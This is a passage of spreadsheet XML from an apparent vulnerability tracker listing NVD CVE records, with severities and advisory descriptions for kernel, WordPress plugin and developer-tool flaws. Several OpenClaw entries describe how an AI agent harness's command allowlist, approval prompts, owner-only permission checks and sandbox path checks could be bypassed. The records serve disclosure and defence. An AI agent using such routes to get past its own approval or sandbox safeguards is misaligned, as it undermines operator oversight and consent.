      <c r="N74" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O74" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P74" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q74" s="5" t="inlineStr"/>
      <c r="R74" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S74" s="5" t="inlineStr">
        <is>
          <t>The Modula Image Gallery – Photo Grid &amp; Video Gallery plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the upload_image function in all versions up to, and including, 3.0.2. This makes it possible for authenticated attackers, with author-level access and above, to delete arbitrary files on the server. The path restriction to wp-content/uploads is not an effective ownership boundary, as all user attachment files reside within that tree, and Authors trivially satisfy the edit_post check on their own galleries.</t>
        </is>
      </c>
      <c r="T74" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92713</t>
        </is>
      </c>
    </row>
    <row r="75">
      <c r="A75" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B75" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C75" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97570</t>
        </is>
      </c>
      <c r="D75" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E75" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F75" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G75" s="5" t="inlineStr"/>
      <c r="H75" s="5" t="inlineStr"/>
      <c r="I75" s="5" t="inlineStr"/>
      <c r="J75" s="5" t="inlineStr"/>
      <c r="K75" s="5" t="inlineStr"/>
      <c r="L75" s="5" t="inlineStr"/>
      <c r="M75" s="5" t="inlineStr"/>
      <c r="N75" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O75" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P75" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q75" s="5" t="inlineStr"/>
      <c r="R75" s="5" t="inlineStr"/>
      <c r="S75" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bnxt_en: Bound SW TPA IDs to prevent crashes
FW supports up to 1024 concurrent TPAs, so the FW TPA ID is in the range
0..1023 (see commit ec4d8e7cf024 ("bnxt_en: Add TPA ID mapping logic for
57500 chips.")). bnxt_alloc_agg_idx is intended to wrap the FW ID down to a
software ID which is used to index rxr-&gt;rx_tpa, and to generate a mapping
between FW IDs and the wrapped software ID.
On a 57608 with firmware version 233, the firmware advertises 32
concurrent TPAs. As of the commit under fixes, bp-&gt;max_tpa on this NIC
is set to 32.
If the software ID from bnxt_alloc_agg_idx is above 31, this results in
an invalid address being loaded on this line:
  tpa_info = &amp;rxr-&gt;rx_tpa[agg_id];
because rx_tpa is allocated with only bp-&gt;max_tpa (32) entries. Writes
to tpa_info later in the code are out of bounds.
This bug results in a crash at boot:
Oops: general protection fault, kernel NULL pointer dereference 0x8: 0000 [#1] SMP NOPTI
RIP: 0010:bnxt_rx_pkt+0xc0/0x1560
RSP: 0018:ffffc900009b8c78 EFLAGS: 00010246
RAX: 0000000000000000 RBX: 0000000000000048 RCX: 0000000206682516
RDX: ffffc900009b8db4 RSI: 0000000000000000 RDI: 01ffffff038fe1c0
RBP: ffffc9006e687480 R08: ffffc9006e687000 R09: 0000000000003048
R10: 0000000000000480 R11: ffff8881c6083900 R12: 0000000006682516
R13: ffff8881c6095400 R14: 0000000000000016 R15: ffff8881c6b66680
FS:  0000000000000000(0000) GS:ffff88fef3c77000(0000) knlGS:0000000000000000
CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 00007fc8bda40584 CR3: 000000807c812001 CR4: 0000000008772ef0
PKRU: 55555554
Call Trace:
 &lt;IRQ&gt;
 ? __netif_receive_skb_list_core+0x1ca/0x250
 __bnxt_poll_work+0x152/0x280
 bnxt_poll_p5+0x1cd/0x480
 __napi_poll+0x30/0x180
 net_rx_action+0x20b/0x3b0
 ? note_gp_changes+0x53/0xe0
 ? tick_setup_sched_timer+0x180/0x180
 ? __napi_schedule+0x9a/0xb0
 ? bnxt_msix+0x24/0x30
 handle_softirqs+0xdd/0x2c0
 __irq_exit_rcu.llvm.3171231171502365008+0x47/0xf0
 common_interrupt+0x85/0x90
 &lt;/IRQ&gt;
 &lt;TASK&gt;
 asm_common_interrupt+0x22/0x40
This stack trace is from a crash triggered when an out of bounds rx_tpa
is dereferenced. The invalid write mentioned above is silent in this
particular crash.
Fix this by allocating rx_tpa with bp-&gt;max_tpa rounded up to the next
power of 2 (bp-&gt;max_tpa_roundup_size) entries and masking the FW TPA ID
with that size, so the wrapped ID can never index past the end of the
array.</t>
        </is>
      </c>
      <c r="T75" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97570</t>
        </is>
      </c>
    </row>
    <row r="76">
      <c r="A76" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B76" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C76" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97573</t>
        </is>
      </c>
      <c r="D76" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E76" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F76" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G76" s="5" t="inlineStr"/>
      <c r="H76" s="5" t="inlineStr"/>
      <c r="I76" s="5" t="inlineStr"/>
      <c r="J76" s="5" t="inlineStr"/>
      <c r="K76" s="5" t="inlineStr"/>
      <c r="L76" s="5" t="inlineStr"/>
      <c r="M76" s="5" t="inlineStr"/>
      <c r="N76" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O76" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P76" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q76" s="5" t="inlineStr"/>
      <c r="R76" s="5" t="inlineStr"/>
      <c r="S76" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bnxt_en: Handle buffer allocation failure in bnxt_rx_ring_reset()
bnxt_rx_ring_reset() frees the ring buffers and then reallocates them,
ignoring the result.
bnxt_alloc_one_rx_ring() can fail in bnxt_alloc_one_tpa_info_data(), which
returns -ENOMEM on the first failed allocation and leaves the remaining
rxr-&gt;rx_tpa[] entries zeroed.
The error isn't propagated up, so the loop in bnxt_rx_ring_reset
continues and at the end the code re-enables TPA with partially
unallocated rx_tpa array.
This means that when the agg_id from hardware is mapped to a SW index in
rxr-&gt;rx_tpa[], an uninitialized slot can be chosen which would hand a
zero DMA address to the device.
Fix this by falling back to a global reset, which is what the existing
code already does when other functions fail, but unlike the other
failure cases this particular failure has to return because TPA can't
be re-enabled since the allocation failed.</t>
        </is>
      </c>
      <c r="T76" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97573</t>
        </is>
      </c>
    </row>
    <row r="77">
      <c r="A77" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B77" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C77" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97875</t>
        </is>
      </c>
      <c r="D77" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E77" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F77" s="5" t="inlineStr">
        <is>
          <t>74b3a70d-cca6-4d34-9789-e83b222ae3be</t>
        </is>
      </c>
      <c r="G77" s="5" t="inlineStr"/>
      <c r="H77" s="5" t="inlineStr"/>
      <c r="I77" s="5" t="inlineStr"/>
      <c r="J77" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K77" s="5" t="inlineStr"/>
      <c r="L77" s="5" t="inlineStr"/>
      <c r="M77" s="5" t="inlineStr"/>
      <c r="N77" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O77" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P77" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q77" s="5" t="inlineStr"/>
      <c r="R77" s="5" t="inlineStr">
        <is>
          <t>CWE-350</t>
        </is>
      </c>
      <c r="S77" s="5" t="inlineStr">
        <is>
          <t>Rojo's "rojo serve" HTTP API (default port 34872) has no Host/Origin header validation, making it vulnerable to DNS rebinding. A malicious webpage can read all project source, write malicious code to files on disk, and launch local programs via opener::open() with no user interaction beyond visiting the page.</t>
        </is>
      </c>
      <c r="T77" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97875</t>
        </is>
      </c>
    </row>
    <row r="78">
      <c r="A78" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B78" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C78" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98069</t>
        </is>
      </c>
      <c r="D78" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E78" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F78" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G78" s="5" t="inlineStr"/>
      <c r="H78" s="5" t="inlineStr"/>
      <c r="I78" s="5" t="inlineStr"/>
      <c r="J78" s="5" t="inlineStr">
        <is>
          <t>oracle</t>
        </is>
      </c>
      <c r="K78" s="5" t="inlineStr"/>
      <c r="L78" s="5" t="inlineStr"/>
      <c r="M78" s="5" t="inlineStr"/>
      <c r="N78" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O78" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P78" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q78" s="5" t="inlineStr"/>
      <c r="R78" s="5" t="inlineStr"/>
      <c r="S78" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net/rds: acquire the fastpath locks in rds_conn_shutdown()
rds_conn_shutdown() quiesces the transmit and receive-refill paths by
waiting for RDS_IN_XMIT and RDS_RECV_REFILL to be sampled clear, and
then runs the transport shutdown and rds_conn_path_reset().  Sampling
the bits clear is not the same as owning them: the moment after the
wait_event() returns, rds_send_xmit() can re-acquire RDS_IN_XMIT (or
rds_ib_recv_refill() can re-acquire RDS_RECV_REFILL) and run
concurrently with the teardown.
The sender does recheck the connection state after taking the lock,
but that recheck is a classic store-buffering pattern: teardown writes
the state and reads the bit while the sender writes the bit and reads
the state.  acquire_in_xmit() is only an acquire operation, so on
weakly ordered architectures both sides can miss each other's write,
and the transmit path then runs while the transport zeroes its rings
(e.g. rds_ib_ring_init()) and rds_send_path_reset() rewrites the
transmit state under it.
Oracle UEK fixed the same class of crashes - a 14-year tail of
BUG_ON()s in rds_ib_sub_signaled(), unexpected op-codes and NULL
dereferences in rds_ib_send_cqe_handler() during failover testing -
by making the teardown path *acquire* the fastpath bit locks instead
of testing them ("rds: Make sure transmit path and connection
tear-down does not run concurrently").  Ownership of a single word is
decided by RMW atomicity, so no cross-variable ordering is needed.
Do the same here: take both locks before calling the transport
shutdown, hold them across rds_conn_path_reset(), and release them
explicitly with a wake-up afterwards.  Both are released with
clear_bit_unlock(), so that the ring re-initialization done by the
transport shutdown and the transmit state rewritten by
rds_send_path_reset() are ordered before either bit is seen clear by
the next acquire_in_xmit() or acquire_refill().
The fastpath users of these bits - rds_send_xmit() and
rds_ib_recv_refill() - are trylock style and back off while teardown
owns the locks, so no new lock dependency is introduced for them.
rds_tcp_reset_callbacks() is different: since the previous patch it
acquires RDS_IN_XMIT as well, and it blocks doing so, so its wait now
spans the teardown instead of at most one send batch.  That waiter
runs from rds_tcp_accept_one() on the single-threaded krdsd workqueue
and holds rds_tcp_accept_lock and t_conn_path_lock while it waits, so
a duelling SYN accepted while its path is being torn down parks
accept processing for the duration of the teardown - for TCP bounded
by the (up to 5 s) drain loop in rds_tcp_conn_path_shutdown().  An IB
path's drain in rds_ib_conn_path_shutdown() has no round cap, but no
blocking waiter either: rds_tcp_reset_callbacks() is the only blocking
acquirer of these bits and waits only on its own TCP path, and the
fastpaths are trylock-and-back-off on both transports, so a long IB
drain lengthens only that path's own quiesce.  The
window is narrow: the accept-side state check has to pass before the
teardown moves the path to RDS_CONN_DISCONNECTING.
Because krdsd is a single global workqueue, everything else queued
there - accept processing for other connections and network
namespaces, and the flush_workqueue(rds_wq) in rds_tcp_listen_stop()
during namespace teardown - waits behind the parked accept worker for
that time.  It cannot deadlock, although the waits do point at each
other: the teardown blocks until the bit's holder releases it, and
the holder may be that krdsd accept worker.  The holder finishes
without needing anything the teardown owns: the sync cancels
rds_tcp_reset_callbacks() issues target cp_send_w and cp_recv_w on
the path's ordered cp_wq, whose only execution slot is occupied by
the blocked cp_down_w itself, so they are pending at most and cancel
without flushing - a reliance on cp_wq being ordered that is now
noted next to those cancels (on 
---truncated---</t>
        </is>
      </c>
      <c r="T78" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98069</t>
        </is>
      </c>
    </row>
    <row r="79">
      <c r="A79" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B79" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C79" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98070</t>
        </is>
      </c>
      <c r="D79" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E79" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F79" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G79" s="5" t="inlineStr"/>
      <c r="H79" s="5" t="inlineStr"/>
      <c r="I79" s="5" t="inlineStr"/>
      <c r="J79" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K79" s="5" t="inlineStr"/>
      <c r="L79" s="5" t="inlineStr"/>
      <c r="M79" s="5" t="inlineStr"/>
      <c r="N79" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O79" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P79" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q79" s="5" t="inlineStr"/>
      <c r="R79" s="5" t="inlineStr"/>
      <c r="S79" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net/rds: acquire RDS_IN_XMIT in rds_tcp_reset_callbacks()
rds_tcp_reset_callbacks() quiesces the transmit path by setting the
path state to RDS_CONN_RESETTING and then waiting for RDS_IN_XMIT to
be sampled clear before swapping the underlying socket and calling
rds_send_path_reset().
Sampling the bit clear is not the same as owning it: rds_send_xmit()
can re-acquire RDS_IN_XMIT right after the wait_event() returns.  Its
state recheck after taking the lock is a store-buffering pattern (the
resetter writes the state and reads the bit, the sender writes the
bit and reads the state) and acquire_in_xmit() is only an acquire
operation, so on weakly ordered architectures both sides can miss
each other's write and the transmit path then runs concurrently with
rds_send_path_reset() rewriting cp_xmit_* state - which is exactly
what the comment above rds_send_path_reset() tells its callers to
prevent.
Take the lock instead, hold it across the socket swap and
rds_send_path_reset(), and release it with a wake-up at the end.  The
lock-ordering constraint documented above the wait still holds: the
lock is acquired before lock_sock(), so a sender inside tcp_sendmsg()
can never be waited on while we hold the socket lock.
Two details of the old code go away with the same change:
 - t_sock is now read only after the lock is acquired.  The old code
   cached it before waiting; the teardown in rds_conn_shutdown()
   releases that socket and clears t_sock, so a pointer cached before
   the wait can be stale by the time the accept path resumes.  Reading
   it under RDS_IN_XMIT is what makes the exclusion complete once the
   teardown owns the same lock, which the next patch arranges; until
   then the teardown still only samples the bit, and the two paths
   remain as exposed to each other as they are today.
 - The old !osock early path called rds_send_path_reset() with no
   serialization at all.  It now runs under the lock like the normal
   path.  The conditional RDS_CONN_RESETTING transition of the
   previous patch happens before the socket check either way: a path
   found without a socket is either still connecting (its reconnect
   worker blocked on t_conn_path_lock) and legitimately goes
   RESETTING -&gt; UP on the new socket, or it has been torn down
   meanwhile and is dropped.
The in-function comment describing the old wait-based quiesce is
rewritten to describe the lock-based one, and the stale block comment
above the function (which still described a return value and an
incomplete list of t_sock writers) is refreshed to name all four
writers - the connect, accept, teardown and swap paths - and what
serializes each of them.</t>
        </is>
      </c>
      <c r="T79" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98070</t>
        </is>
      </c>
    </row>
    <row r="80">
      <c r="A80" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B80" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C80" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98130</t>
        </is>
      </c>
      <c r="D80" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E80" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F80" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G80" s="5" t="inlineStr"/>
      <c r="H80" s="5" t="inlineStr"/>
      <c r="I80" s="5" t="inlineStr"/>
      <c r="J80" s="5" t="inlineStr"/>
      <c r="K80" s="5" t="inlineStr"/>
      <c r="L80" s="5" t="inlineStr"/>
      <c r="M80" s="5" t="inlineStr"/>
      <c r="N80" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O80" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P80" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q80" s="5" t="inlineStr"/>
      <c r="R80" s="5" t="inlineStr"/>
      <c r="S80" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
sctp: fix a TOCTOU race in SCTP_CMD_TIMER_START
The SCTP_CMD_TIMER_START handler checks timer_pending() before calling
timer_reduce(). The timer can expire and detach between these operations,
causing timer_reduce() to rearm the timer without taking the association
reference required for the newly armed timer.
The timer callback later unconditionally drops its association reference,
which can leave the association reference count unbalanced and result in
use-after-free during association teardown.
Use the return value of timer_reduce() to determine whether the timer was
actually armed. Take the association reference only when timer_reduce()
successfully starts a new timer, closing the race between checking the
timer state and rearming it.
This issue was reported by Nico Yip (@_cyeaa_) working with TrendAI Zero
Day Initiative.</t>
        </is>
      </c>
      <c r="T80" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98130</t>
        </is>
      </c>
    </row>
    <row r="81">
      <c r="A81" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B81" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C81" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100559</t>
        </is>
      </c>
      <c r="D81" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E81" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F81" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G81" s="5" t="inlineStr"/>
      <c r="H81" s="5" t="inlineStr"/>
      <c r="I81" s="5" t="inlineStr"/>
      <c r="J81" s="5" t="inlineStr"/>
      <c r="K81" s="5" t="inlineStr"/>
      <c r="L81" s="5" t="inlineStr"/>
      <c r="M81" s="5" t="inlineStr"/>
      <c r="N81" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O81" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P81" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q81" s="5" t="inlineStr"/>
      <c r="R81" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S81" s="5" t="inlineStr">
        <is>
          <t>OpenClaw versions before 2026.8.1 contain a command parser vulnerability where escaped newlines confuse exec allowlist parsing, allowing hidden commands to execute. Attackers can craft input with escaped newlines to bypass allowlist validation and execute additional commands without expected authorization prompts.</t>
        </is>
      </c>
      <c r="T81" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100559</t>
        </is>
      </c>
    </row>
    <row r="82">
      <c r="A82" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B82" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C82" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100561</t>
        </is>
      </c>
      <c r="D82" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E82" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F82" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G82" s="5" t="inlineStr"/>
      <c r="H82" s="5" t="inlineStr"/>
      <c r="I82" s="5" t="inlineStr"/>
      <c r="J82" s="5" t="inlineStr">
        <is>
          <t>npm, rust</t>
        </is>
      </c>
      <c r="K82" s="5" t="inlineStr"/>
      <c r="L82" s="5" t="inlineStr"/>
      <c r="M82" s="5" t="inlineStr"/>
      <c r="N82" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O82" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P82" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q82" s="5" t="inlineStr"/>
      <c r="R82" s="5" t="inlineStr">
        <is>
          <t>CWE-88</t>
        </is>
      </c>
      <c r="S82" s="5" t="inlineStr">
        <is>
          <t>OpenClaw (npm package 'openclaw') versions &gt;= 2026.3.22 and &lt; 2026.8.1 contain an approval-bypass flaw in the exec approval policy: the policy could trust a command-running wrapper without inspecting the command carried in its arguments. After an operator allowlisted or permanently approved a benign wrapper invocation, a later agent turn could substitute an arbitrary inner command and execute it with the OpenClaw process's host privileges without a further approval prompt. Exploitation requires the relevant wrapper to resolve on the host and a prior operator decision allowing that wrapper. Transparent shell carriers and opaque utilities such as process monitors, tracers, namespace tools, and proxy wrappers were affected through related trust-resolution gaps. Fixed in 2026.8.1.</t>
        </is>
      </c>
      <c r="T82" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100561</t>
        </is>
      </c>
    </row>
    <row r="83">
      <c r="A83" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B83" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C83" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100585</t>
        </is>
      </c>
      <c r="D83" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E83" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F83" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G83" s="5" t="inlineStr"/>
      <c r="H83" s="5" t="inlineStr"/>
      <c r="I83" s="5" t="inlineStr"/>
      <c r="J83" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K83" s="5" t="inlineStr"/>
      <c r="L83" s="5" t="inlineStr"/>
      <c r="M83" s="5" t="inlineStr"/>
      <c r="N83" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O83" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P83" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q83" s="5" t="inlineStr"/>
      <c r="R83" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S83" s="5" t="inlineStr">
        <is>
          <t>OpenClaw (npm package `openclaw`) before 2026.7.1 fails to enforce the owner-only authorization requirement for Claude Code permission prompts delivered through the MCP channel bridge. An authorized non-owner channel sender with channel command access can approve or deny a pending permission request intended for the owner, causing the requested action to proceed without owner consent. The practical impact depends on the pending action and the host capabilities requested by the Claude Code run. The issue is fixed in version 2026.7.1.</t>
        </is>
      </c>
      <c r="T83" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100585</t>
        </is>
      </c>
    </row>
    <row r="84">
      <c r="A84" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B84" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C84" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100570</t>
        </is>
      </c>
      <c r="D84" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E84" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F84" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G84" s="5" t="inlineStr"/>
      <c r="H84" s="5" t="inlineStr"/>
      <c r="I84" s="5" t="inlineStr"/>
      <c r="J84" s="5" t="inlineStr">
        <is>
          <t>npm, python, rust</t>
        </is>
      </c>
      <c r="K84" s="5" t="inlineStr"/>
      <c r="L84" s="5" t="inlineStr"/>
      <c r="M84" s="5" t="inlineStr"/>
      <c r="N84" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O84" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P84" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q84" s="5" t="inlineStr"/>
      <c r="R84" s="5" t="inlineStr">
        <is>
          <t>CWE-88</t>
        </is>
      </c>
      <c r="S84" s="5" t="inlineStr">
        <is>
          <t>OpenClaw (npm package 'openclaw') versions &gt;= 2026.3.28 and &lt; 2026.8.1 allow an untrusted workspace .env file to set the CLOUDSDK_PYTHON_ARGS environment variable. When an operator starts OpenClaw in attacker-controlled workspace content and then runs the Gmail setup flow, that value is inherited when gcloud is launched, and the gcloud launcher passes it as arguments to the trusted Python interpreter. A crafted CLOUDSDK_PYTHON_ARGS value can therefore cause Python to execute attacker-supplied code with the OpenClaw host user's permissions, allowing credentials to be read, files to be modified, or other processes to be started. This issue is fixed in version 2026.8.1; as a workaround, run Gmail setup only from trusted workspaces and clear inherited CLOUDSDK_* variables beforehand.</t>
        </is>
      </c>
      <c r="T84" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100570</t>
        </is>
      </c>
    </row>
    <row r="85">
      <c r="A85" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B85" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C85" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100597</t>
        </is>
      </c>
      <c r="D85" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E85" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F85" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G85" s="5" t="inlineStr"/>
      <c r="H85" s="5" t="inlineStr"/>
      <c r="I85" s="5" t="inlineStr"/>
      <c r="J85" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K85" s="5" t="inlineStr"/>
      <c r="L85" s="5" t="inlineStr"/>
      <c r="M85" s="5" t="inlineStr"/>
      <c r="N85" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O85" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P85" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q85" s="5" t="inlineStr"/>
      <c r="R85" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="S85" s="5" t="inlineStr">
        <is>
          <t>OpenClaw (npm package 'openclaw') before 2026.7.1 is vulnerable to a time-of-check time-of-use race condition in OpenShell local mirror filesystem mutation operations. The remove, mkdir, and rename operations could act on a different filesystem target after OpenClaw completed its sandbox path-safety check, if the path is changed concurrently. An attacker able to win the race can cause a sandboxed operation to delete, create, or rename a host path outside the intended mirror root with the permissions of the OpenClaw process user. This does not require an operator to have granted host filesystem access outside the sandbox. The issue is fixed in 2026.7.1.</t>
        </is>
      </c>
      <c r="T85" s="6" t="inlineStr">
